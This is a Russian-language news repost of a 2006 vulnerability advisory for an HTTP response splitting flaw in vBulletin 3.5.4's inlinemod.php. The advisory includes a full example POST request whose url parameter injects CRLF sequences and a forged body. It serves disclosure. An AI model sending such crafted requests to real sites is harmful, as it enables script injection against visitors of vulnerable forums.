Категория > Новости мира Интернет > Уязвимость HTTP Response Splitting в vBulletin - «Интернет»
Уязвимость HTTP Response Splitting в vBulletin - «Интернет»2-05-2006, 05:50. Автор: Little |
|
Программа: vBulletin 3.5.4 Описание: Уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: POST /vb354/inlinemod.php HTTP/1.0Cookie: bbpassword=a5c3d9e61bcb8dea99105143c772bcd9; bbuserid=1 Content-Length: 93 Accept: */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Host: www.vulnerable.com Content-Type: application/x-www-form-urlencoded do=clearthread&url=lala2%0d%0aContent-Length: 33%0d%0a%0d%0aHacked!%0d%0a%0d%0a Уязвимость обнаружил Агиевич Игорь aka Shanker (shanker@mail.ru) URL производителя: http://www.vbulletin.com Перейти обратно к новости |